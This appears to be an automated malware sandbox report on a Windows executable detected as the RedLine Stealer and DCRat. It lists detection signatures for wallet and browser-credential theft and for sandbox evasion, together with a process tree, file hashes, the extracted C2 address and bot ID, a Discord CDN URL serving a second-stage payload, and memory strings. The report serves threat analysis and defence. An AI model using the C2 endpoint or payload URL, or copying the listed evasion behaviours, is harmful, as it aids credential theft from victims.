Loading ...

Play interactive tourEdit tour

Windows Analysis Report MVB56JJDeJ.exe

Overview

General Information

Sample Name:MVB56JJDeJ.exe
Analysis ID:505244
MD5:e551858d7c25a5874ac81a13ca3ca24d
SHA1:a8b4217a9e68264e72c416b5c33dbc403c7acd3c
SHA256:f9349003a92f82606eede0b5ebd94af025f1a2a76a481df38075723e3af054be
Tags:exeRedLineStealer
Infos:

Most interesting Screenshot:

Detection

DCRat RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Found malware configuration
Multi AV Scanner detection for submitted file
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for dropped file
Detected unpacking (creates a PE file in dynamic memory)
Yara detected DCRat
Hides threads from debuggers
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to steal Crypto Currency Wallets
Query firmware table information (likely to detect VMs)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
Found many strings related to Crypto-Wallets (likely being stolen)
Drops PE files with benign system names
Tries to harvest and steal browser information (history, passwords, etc)
PE file contains section with special chars
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Sleep loop found (likely to delay execution)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Entry point lies outside standard sections
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • MVB56JJDeJ.exe (PID: 6664 cmdline: 'C:\Users\user\Desktop\MVB56JJDeJ.exe' MD5: E551858D7C25A5874AC81A13CA3CA24D)
    • 123.exe (PID: 3160 cmdline: 'C:\Users\user\AppData\Local\Temp\123.exe' MD5: 8A0FAE504673180E1BB94C93260C2D7F)
  • cleanup

Malware Configuration

Threatname: RedLine

{"C2 url": ["185.244.217.166:56316"], "Bot Id": "@pankoka"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.731038018.0000000000160000.00000004.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      00000000.00000002.732418954.00000000010C0000.00000004.00020000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        00000000.00000002.732036861.00000000009B1000.00000004.00000020.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          00000000.00000002.731086479.0000000000191000.00000040.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.MVB56JJDeJ.exe.10c0000.6.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              0.2.MVB56JJDeJ.exe.3e25530.7.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                0.2.MVB56JJDeJ.exe.3e25530.7.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  0.2.MVB56JJDeJ.exe.9ca598.5.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    0.2.MVB56JJDeJ.exe.1a2890.3.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                      Click to see the 8 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 0.2.MVB56JJDeJ.exe.9ca598.5.raw.unpackMalware Configuration Extractor: RedLine {"C2 url": ["185.244.217.166:56316"], "Bot Id": "@pankoka"}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: MVB56JJDeJ.exeVirustotal: Detection: 39%Perma Link
                      Source: MVB56JJDeJ.exeReversingLabs: Detection: 39%
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Temp\123.exeMetadefender: Detection: 28%Perma Link
                      Source: C:\Users\user\AppData\Local\Temp\123.exeReversingLabs: Detection: 39%
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\explorer.exeMetadefender: Detection: 28%Perma Link
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\explorer.exeReversingLabs: Detection: 39%
                      Machine Learning detection for sampleShow sources
                      Source: MVB56JJDeJ.exeJoe Sandbox ML: detected
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Temp\123.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\explorer.exeJoe Sandbox ML: detected

                      Compliance:

                      barindex
                      Detected unpacking (creates a PE file in dynamic memory)Show sources
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeUnpacked PE file: 0.2.MVB56JJDeJ.exe.190000.2.unpack
                      Source: MVB56JJDeJ.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DEBUG_STRIPPED, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                      Source: unknownHTTPS traffic detected: 45.130.41.15:443 -> 192.168.2.4:49775 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.4:49776 version: TLS 1.2
                      Source: Binary string: e:\workfolders\5.0\sys\bootstartup\bootstartup\objfre_wnet_amd64\amd64\BootStartup.pdb source: 123.exe, 00000007.00000000.727794455.00000000008AA000.00000002.00020000.sdmp, 123.exe.0.dr
                      Source: Binary string: d:\winapps\5.0\sys\bootstartup\bootstartup\objfre_wxp_x86\i386\BootStartup.pdb source: 123.exe, 00000007.00000000.727794455.00000000008AA000.00000002.00020000.sdmp, 123.exe.0.dr
                      Source: Binary string: e:\workfolders\5.0\sys\bootstartup\bootstartup\objfre_wxp_x86\i386\BootStartup.pdb source: 123.exe, 00000007.00000000.727794455.00000000008AA000.00000002.00020000.sdmp, 123.exe.0.dr
                      Source: Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: 123.exe, 00000007.00000002.924437992.0000000000220000.00000040.00020000.sdmp
                      Source: Binary string: d:\winapps\5.0\sys\bootstartup\bootstartup\objfre_wxp_x86\i386\BootStartup.pdb source: 123.exe, 00000007.00000000.727794455.00000000008AA000.00000002.00020000.sdmp, 123.exe.0.dr
                      Source: Binary string: d:\winapps\5.0\sys\bootstartup\bootstartup\objfre_wnet_amd64\amd64\BootStartup.pdb source: 123.exe, 00000007.00000000.727794455.00000000008AA000.00000002.00020000.sdmp, 123.exe.0.dr
                      Source: Binary string: e:\workfolders\5.0\sys\bootstartup\bootstartup\objfre_wxp_x86\i386\BootStartup.pdb source: 123.exe, 00000007.00000000.727794455.00000000008AA000.00000002.00020000.sdmp, 123.exe.0.dr
                      Source: Binary string: C:\Files\Crypter\NmL3Irm4QMpJZ0SFUU67\Release\HostingCLR.pdb source: MVB56JJDeJ.exe
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeCode function: 0_2_00588240 FindFirstFileA,_errno,GetLastError,_errno,_errno,_errno,_errno,_errno,
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeCode function: 0_2_00194EEF FindFirstFileExW,
                      Source: Joe Sandbox ViewASN Name: ON-LINE-DATAServerlocation-NetherlandsDrontenNL ON-LINE-DATAServerlocation-NetherlandsDrontenNL
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: by.greentry.siteConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /attachments/897970496841347094/899319021416116294/123.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 45.130.41.15 45.130.41.15
                      Source: Joe Sandbox ViewIP Address: 162.159.135.233 162.159.135.233
                      Source: Joe Sandbox ViewIP Address: 162.159.135.233 162.159.135.233
                      Source: global trafficTCP traffic: 192.168.2.4:49774 -> 185.244.217.166:56316
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.244.217.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.244.217.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.244.217.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.244.217.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.244.217.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.244.217.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.244.217.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.244.217.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.244.217.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.244.217.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.244.217.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.244.217.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.244.217.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.244.217.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.244.217.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.244.217.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.244.217.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.244.217.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.244.217.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.244.217.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.244.217.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.244.217.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.244.217.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.244.217.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.244.217.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.244.217.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.244.217.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.244.217.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.244.217.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.244.217.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.244.217.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.244.217.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.244.217.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.244.217.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.244.217.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.244.217.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.244.217.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.244.217.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.244.217.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.244.217.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.244.217.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.244.217.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.244.217.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.244.217.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.244.217.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.244.217.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.244.217.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.244.217.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.244.217.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.244.217.166
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733685867.0000000003050000.00000004.00000001.sdmpString found in binary or memory: m9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733685867.0000000003050000.00000004.00000001.sdmpString found in binary or memory: romium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-j
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733685867.0000000003050000.00000004.00000001.sdmpString found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
                      Source: 123.exe, 00000007.00000000.727794455.00000000008AA000.00000002.00020000.sdmp, 123.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                      Source: 123.exe, 00000007.00000000.727794455.00000000008AA000.00000002.00020000.sdmp, 123.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
                      Source: 123.exe, 00000007.00000000.727794455.00000000008AA000.00000002.00020000.sdmp, 123.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
                      Source: 123.exe, 00000007.00000000.727794455.00000000008AA000.00000002.00020000.sdmp, 123.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733532881.0000000002FFF000.00000004.00000001.sdmpString found in binary or memory: http://cdn.discordapp.com
                      Source: MVB56JJDeJ.exe, 00000000.00000002.736789549.00000000061C0000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733264935.0000000002EF0000.00000004.00000001.sdmp, 123.exe.0.drString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                      Source: 123.exe, 00000007.00000000.727794455.00000000008AA000.00000002.00020000.sdmp, 123.exe.0.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                      Source: 123.exe, 00000007.00000000.727794455.00000000008AA000.00000002.00020000.sdmp, 123.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                      Source: 123.exe, 00000007.00000000.727794455.00000000008AA000.00000002.00020000.sdmp, 123.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                      Source: 123.exe, 00000007.00000000.727794455.00000000008AA000.00000002.00020000.sdmp, 123.exe.0.drString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
                      Source: 123.exe, 00000007.00000000.727794455.00000000008AA000.00000002.00020000.sdmp, 123.exe.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                      Source: 123.exe, 00000007.00000000.727794455.00000000008AA000.00000002.00020000.sdmp, 123.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                      Source: 123.exe, 00000007.00000000.727794455.00000000008AA000.00000002.00020000.sdmp, 123.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                      Source: 123.exe, 00000007.00000000.727794455.00000000008AA000.00000002.00020000.sdmp, 123.exe.0.drString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
                      Source: 123.exe, 00000007.00000000.727794455.00000000008AA000.00000002.00020000.sdmp, 123.exe.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733264935.0000000002EF0000.00000004.00000001.sdmp, 123.exe.0.drString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733685867.0000000003050000.00000004.00000001.sdmpString found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733685867.0000000003050000.00000004.00000001.sdmpString found in binary or memory: http://forms.rea
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733685867.0000000003050000.00000004.00000001.sdmpString found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733685867.0000000003050000.00000004.00000001.sdmpString found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733685867.0000000003050000.00000004.00000001.sdmpString found in binary or memory: http://go.micros
                      Source: MVB56JJDeJ.exe, 00000000.00000003.730699317.0000000009D54000.00000004.00000001.sdmp, MVB56JJDeJ.exe, 00000000.00000003.709788089.0000000009D41000.00000004.00000001.sdmpString found in binary or memory: http://ns.ado/1
                      Source: MVB56JJDeJ.exe, 00000000.00000003.730699317.0000000009D54000.00000004.00000001.sdmp, MVB56JJDeJ.exe, 00000000.00000003.709788089.0000000009D41000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.c/g
                      Source: MVB56JJDeJ.exe, 00000000.00000003.730699317.0000000009D54000.00000004.00000001.sdmp, MVB56JJDeJ.exe, 00000000.00000003.709788089.0000000009D41000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.cobj
                      Source: 123.exe, 00000007.00000000.727794455.00000000008AA000.00000002.00020000.sdmp, 123.exe.0.drString found in binary or memory: http://ocsp.digicert.com0C
                      Source: 123.exe, 00000007.00000000.727794455.00000000008AA000.00000002.00020000.sdmp, 123.exe.0.drString found in binary or memory: http://ocsp.digicert.com0H
                      Source: 123.exe, 00000007.00000000.727794455.00000000008AA000.00000002.00020000.sdmp, 123.exe.0.drString found in binary or memory: http://ocsp.digicert.com0I
                      Source: 123.exe, 00000007.00000000.727794455.00000000008AA000.00000002.00020000.sdmp, 123.exe.0.drString found in binary or memory: http://ocsp.digicert.com0O
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733264935.0000000002EF0000.00000004.00000001.sdmp, 123.exe.0.drString found in binary or memory: http://ocsp.sectigo.com0#
                      Source: 123.exe, 00000007.00000000.727794455.00000000008AA000.00000002.00020000.sdmp, 123.exe.0.drString found in binary or memory: http://ocsp.thawte.com0
                      Source: 123.exe, 00000007.00000000.727794455.00000000008AA000.00000002.00020000.sdmp, 123.exe.0.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
                      Source: 123.exe, 00000007.00000000.727794455.00000000008AA000.00000002.00020000.sdmp, 123.exe.0.drString found in binary or memory: http://s.symcd.com06
                      Source: 123.exe, 00000007.00000000.727794455.00000000008AA000.00000002.00020000.sdmp, 123.exe.0.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                      Source: 123.exe, 00000007.00000000.727794455.00000000008AA000.00000002.00020000.sdmp, 123.exe.0.drString found in binary or memory: http://s2.symcb.com0
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
